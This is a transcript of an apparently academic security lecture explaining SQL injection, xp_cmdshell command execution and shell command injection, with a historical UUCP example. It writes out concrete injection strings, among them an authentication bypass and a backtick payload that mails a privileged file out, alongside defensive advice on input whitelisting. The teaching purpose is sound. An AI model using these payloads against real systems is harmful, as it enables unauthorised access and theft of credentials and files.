[MUSIC] Now that we talked about cross-site
scripting and its friends, let's move on to attacks on databases,
and systems directly. And with these, the focus is the web,
but they can be run from systems without going through the web it depends on how
the programs in the system are set up. Essentially what an SQL injection does
is it mimics a legitimate SQL command, but in a way or place that is
unexpected and does something inimical. And the next slide, the example gives
you a very good example of this. You can see the web app code, it's SELECT
Username FROM Users WHERE Username = equals and the user supplies that. And the password equals and
the user supplies the password. And what this does is it queries the, uses this query to to get a result. And here, this database is
simply authenticating the user. So, if the user name and
the password that are supplied, match an entry in the SQL database,
it returns, it returns the data, which is true if not, it returns nothing
because there's no match or it's empty. And as you can see from the if statement, that means the bool
authenticated becomes false. Now there's an assumption here that I will
give a legitimate name and a password. Whenever you hear the word assumption,
think how could someone muck with this? So maybe they give an illegitimate
name and a password, and what would be interesting here? Well how about we embed
some SQL commands in there? And that's what the next bullet says. We're going to set the password
to " space OR space " "= ". The two single quotes are interpreted as
a single quote of course, it's an escape. So you can now see what
the SQL query looks like, and I'm doing that from both
log in name and password. Notice where it says user
name what this says is match the entry where the user name is empty or where empty equal empty which is just
trivially true so it's all of them. Same with password if
the password is empty or blank equals blank, empty equals empty. Well that's always true as well, so
what this will do is match anything. I'm saying where empty equals empty and
empty equals empty, so that matches, so now I'm
authenticated because those are true. And now I'm into the system. That's an example of an SQL injection
because the single quote and the or, are legitimate SQL commands but
they're not expected in any username. If you ever seen the comic strip XKCD, Little Bobby Tables is
an excellent example of this because little Bobby Tables
attack is basically exactly this. Now, with Microsoft SQL, it gets even more
interesting, because it is a built-in function enabling you to run a command in
the command interpreter, or the shell. So in essences not only
can you do SQL injection, you can also do command injection. And here's an example. Here, you're getting an item and
a price from a product list, and you get the category from the input,
and it's ordered by price. So the user supplies that little string
under the user supply this, as the input. The semicolon ends the SQL command and then the exec master..xp_cmdshell is the command interpreter so
that will run it. And then dir simply says list
the files in this directory and the dash afterwards just means go to
the end of the line it's a comment. So the dash order by price is ignored,
and that's what you get. And from that, the item category is empty
and the shell executes the commandeer. And then you have the hyphen and then
the single quote, which is ignored because it's in a comment and order by price is
also ignored, because it's in a comment. And so now I've got a listing of
all the files in that directory, obviously, I can do much more. So let's parse this in detail
because this is a little confusing. The next slide does this. The first SQL query is
the one up to the semicolon. The second SQL query is the exec
master xp command shell. That's treated as a shell command,
and is executed. So what that does is it executes
the command in quotes which is dir which means list
the files in that directory. And then trailing comment
is the --" ORDER BY PRICE.. So what this means again is when
you get input don't trust it. If you don't know that it's good dump it. And again you can filter if you must but
filtering is problems. The best way to do filtering instead
of using a blacklist of characters you don't want is use a whitelist
of characters that you will allow. The problem is that hyphen on these
is often used as a legal character, but -- begins an SQL comment so
you have to watch out for that. Also check structure,
as well as simply the characters. Is the input tailored
to be an SQL command? If so, it's dangerous. If you're requesting names
with filtering also, you have the problem that names,
some names have apostrophes, particularly Irish ones like O'Connor,
O'Laughlin so forth. So if you're going to allow this in, you
have to put another apostrophe after them, so the double apostrophe is treated
as a single one by the SQL engine. And in general, apostrophes can alter
commands they're special to SQL. So they can alter
the meaning of a command and cause various nasty sub
processes to execute. And with email addresses it gets even
worse because those can be very, very tricky. So that's SQL injection. Command injection is essentially the same,
except this time we're crafting it so that the commands,
it will run against the operating system. This is similar to the last
injection we saw with SQL, except now we're not even
using the SQL injection. Here's an example on the slide labeled
Example and we have a privileged program. It gets the username from the standard
imput and stores it in address. If that is empty you quit. If that's not empty then what you're going
to do is copy the address into the command shown there, so capital letter and you'll mail it to the person
who's name was typed. That person, by the way,
can be pretty much anyone. And then you'll give that command
to the system to execute. So now instead of entering bishop,
for example, I enter the thing in backticks,
echo me@myhost; cat privfile. So now, when that command is executed,
the cat letter was piped and it goes to mail me@myhost. But then, it will cat or
print the privileged file, the file with the privileges of whatever the program
has, so now I can get a copy of that file. And the ; cat privfile is the exact
command that's being injected. Now I mentioned before, blacklists
are bad, and whitelists are good. And often that seems to find the face
of what most people do, well, here's an example why. This goes back a little bit, it goes back, in fact, to the days of Unix Version 6 and
Version 7. Unix in those days had commands to copy
files over the phone line called UUCP and the command to execute
commands remotely called UX. They would dial up the remote system and
then send over the file or execute the command or whatever. Now, in Version 6, you would could execute something
like is shown under the first bullet. What it would simply do
is send to machine A and execute the cat
/usr/xyzzy/plugh' to print that. Now, commands are whitelisted, so
only those commands that are allowed can be executed remotely and
it's very tightly restricted. Usually, this was used for remote mail,
so that's why our mail is there. And the UUX interpreter was smart enough
to know about certain meta characters, it knew semicolon ended a command,
it knew pipe sign meant another command was coming, and up arrow in Version 6 Unix
was the same as a vertical bar for pipe. Now when they went to Version 7,
they updated the shell so that backticks were first added,
and the ampersand was added for background but they didn't update the UUX
filter that checked for all of these. So if you look at the sequence
of commands there, the L.sys file was very heavily protected
because it contained phone numbers and passwords of systems that this
systems could call up and work with. And so what you'll do is command
as you can see right there. The important point here is
the backticks in the first line. The UUCP command would go ahead and pass those simply because it thought
you know backticks that's not special. But when it got to the other end it
was given to the command interpreter which was a plain old shell
the backticks mean something special and you'd be able to execute whatever is
in there with the privileges of UUCP. In this case, what I wanted to do was
have the shell send me a copy of their remote L.sys file, and
that's exactly what's there. So now I get the connection file,
I get the logins, I get the passwords, I get the phone numbers, I get everything.